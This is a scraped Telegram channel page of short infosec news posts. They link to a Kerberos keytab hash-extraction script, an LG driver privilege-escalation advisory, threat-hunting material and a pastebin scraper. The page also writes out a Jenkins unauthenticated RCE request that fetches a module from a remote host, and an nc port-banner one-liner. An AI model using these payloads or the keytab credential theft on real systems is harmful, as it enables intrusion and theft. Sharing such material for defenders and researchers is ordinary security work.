Information Security
415 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)

https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver


http://www.jackson-t.ca/lg-driver-lpe.html
Jenkins Unauth RCE

/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
No nmap? No problem! Grab banners from local IPv4 listening ports.

netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
[Remote Exec | Persistence] - Hunting for remote windows service creation

https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
pastebin_scraper

https://github.com/Critical-Start/pastebin_scraper


Automated tool to monitor pastebin for interesting information